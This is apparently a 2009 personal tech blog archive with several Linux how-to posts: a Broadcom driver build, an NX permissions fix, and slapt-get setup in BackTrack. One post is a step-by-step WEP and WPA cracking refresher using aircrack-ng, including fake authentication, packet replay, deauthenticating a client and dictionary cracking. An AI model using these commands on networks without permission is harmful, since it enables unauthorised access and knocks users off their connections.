Archive for the BackTrack Category

How to make the Broadcom 4312 Wireless driver work in BackTrack 4 on the Lenovo S10

Posted in BackTrack, Lenovo S10, Linux (Ubuntu) on September 25, 2009 by HydTech

This guide is adapted from Kazalku’s guide on remote exploit forums. Thanks Kazalku.

Download the driver from here and save it in the BT root folder, either by transferring it on a USB drive or by booting into another OS on your multiboot setup.

Untar it:

tar -xvzf hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz

Build the module:
make -C /lib/modules/`uname -r`/build M=`pwd`

Insert the modules:
modprobe ieee80211_crypt_tkip
insmod wl.ko

Now the network device should show as claimed. You can check with:
lshw -C network

Bring it up:
ifconfig eth1 up

Install the module into the kernel module tree so it can be loaded by name:

cp wl.ko /lib/modules/`uname -r`/kernel/net/wireless
depmod -a
modprobe wl

Load the module at every startup:
kate /etc/modules

Add the following lines, save, and close the text editor:
ieee80211_crypt_tkip
wl

Start NetworkManager and configure KNetworkManager:
Type NetworkManager in a konsole, then configure the wireless connection in KNetworkManager at the bottom right of the screen.

Delete the files you created in the root folder now that you don't need them.

Cracking WEP & WPA with IBM Lenovo X60 – Basics

Posted in BackTrack, fedora, Linux (Ubuntu), opensuse on September 14, 2009 by HydTech

At first, injection with the Intel PRO/Wireless cards was impossible. Then came the ipwraw driver. Now we no longer need ipwraw, as the iwl3945 driver supports injection. Most Linux distros now ship with this driver.

Follow these steps for a successful WEP crack in Ubuntu:

download necessary files
sudo apt-get install aircrack-ng

place card in monitor mode
sudo airmon-ng start wlan0

test injection
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80 mon0
(0% means injection is not working)

capture data and write to file called output
sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output mon0

fake authentication
sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

replay mode
sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

run aircrack
sudo aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap

For WPA cracking follow this:

monitor mode
sudo airmon-ng start wlan0

collect handshake
sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0

deauth connected client
sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

cracking
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

These are just refreshers. For more help check http://www.aircrack-ng.org

Freenx nx server problem in Ubuntu Jaunty 9.04

Posted in BackTrack, fedora, Linux (Ubuntu), opensuse on July 1, 2009 by HydTech

After upgrading to Jaunty, I never managed to successfully connect to my desktop using NX. I use a Windows computer with the NoMachine NX client. I always got an error like this:

Info: Proxy running in client mode with pid '1728'
Session: Starting session at 'Sat Jan 12 16:34:05 2008'.
Warning: Connected to remote version 3.0.0 with local version 3.1.0
Info: Connection with remote proxy completed.
Warning: Unrecognized session type 'unix-desktop'. Assuming agent session.
Info: Using ADSL link parameters 512/24/1/0.
Info: Using cache parameters 4/4096KB/16384KB/16384KB.
Info: Using pack method 'adaptive-7' with session 'unix-gnome'.
Info: Using ZLIB data compression 1/1/32.
Info: Using ZLIB stream compression 4/4.
Info: No suitable cache file found.
Info: Forwarding X11 connections to display ':0'.
Info: Forwarding multimedia connections to port '6000'.
Info: Listening to font server connections on port '11000'.
Session: Session started at 'Sat Jan 12 16:58:19 2008'.
Info: Established X server connection.
Info: Using shared memory parameters 0/0K.
Session: Terminating session at 'Sat Jan 12 16:58:19 2008'.
Session: Session terminated at 'Sat Jan 12 16:58:19 2008'.

After hours of searching the web, I concluded the problem is with the ownership and permissions of the .Xauthority file. Here’s how I fixed it:
sudo chown hydtech /home/hydtech/.Xauthority
sudo chgrp hydtech /home/hydtech/.Xauthority

and delete:
sudo rm /home/hydtech/.Xauthority-l
sudo rm /home/hydtech/.Xauthority-c

Now it works like a charm.
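
The manual fix above can be turned into a repeatable check. The following is an added example, not part of the original post: a hypothetical `check_xauthority` function that reports wrong ownership on `.Xauthority` and any leftover `-c`/`-l` lock files. It assumes GNU coreutils `stat` (as on Ubuntu); the mode check is an addition that the post does not perform.

```shell
#!/bin/sh
# Added example: audit the X authority files the post repairs by hand.
# Usage: check_xauthority HOME_DIR EXPECTED_UID EXPECTED_GID
# Prints one line per problem; returns 0 if clean, 1 if anything was found.
# Assumes GNU coreutils stat (as shipped on Ubuntu).
check_xauthority() {
    home=$1; want_uid=$2; want_gid=$3
    xauth_file="$home/.Xauthority"
    problems=0

    if [ ! -e "$xauth_file" ]; then
        echo "MISSING $xauth_file"
        return 1
    fi

    # Owner and group: the post's fix is chown/chgrp back to the session user.
    have_uid=$(stat -c %u "$xauth_file")
    have_gid=$(stat -c %g "$xauth_file")
    if [ "$have_uid" != "$want_uid" ]; then
        echo "OWNER $xauth_file uid=$have_uid expected=$want_uid"
        problems=1
    fi
    if [ "$have_gid" != "$want_gid" ]; then
        echo "GROUP $xauth_file gid=$have_gid expected=$want_gid"
        problems=1
    fi

    # Mode (added check): the file holds the X session cookie,
    # so group and other need no access bits at all.
    mode=$(stat -c %a "$xauth_file")
    case $mode in
        ?00) ;;
        *) echo "MODE $xauth_file mode=$mode expected=600"; problems=1 ;;
    esac

    # Leftover lock files (-c and -l), which the post deletes.
    for lock in "$xauth_file-c" "$xauth_file-l"; do
        if [ -e "$lock" ] || [ -L "$lock" ]; then
            echo "STALE_LOCK $lock"
            problems=1
        fi
    done
    return $problems
}
```

For the account in the post, this would be called as `check_xauthority /home/hydtech "$(id -u hydtech)" "$(id -g hydtech)"`.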

How to Install packages with slapt-get or gslapt in BackTrack 3

Posted in BackTrack, Linux (Ubuntu) on April 21, 2009 by HydTech

Once BackTrack is installed on the hard drive, open the menu and go to K -> BackTrack -> Penetration -> Fast Track
Type:
./fast-track.py -i
Enter the Fast-Track updates menu (1).
Update everything (9).

After the update finishes, select the Installation menu (8).
Install everything (8).
Go back to the Installation menu, select Install Slapt-Get (1)
Install Slapt-Get (2), then select update SlackWare (1).
Exit (10)

Now you can use slapt-get to install packages from the Slackware repositories. For example, if you want to install mozilla-thunderbird:
Make sure it exists in the repositories:
slapt-get --search thunderbird
If you find it, use the install parameter to install it:
slapt-get --install mozilla-thunderbird-2.0.0.21-i686-1

You can also use the GUI front-end for slapt-get, gslapt, but it is broken by default in BT3, so let’s reinstall it:
slapt-get --install --reinstall gslapt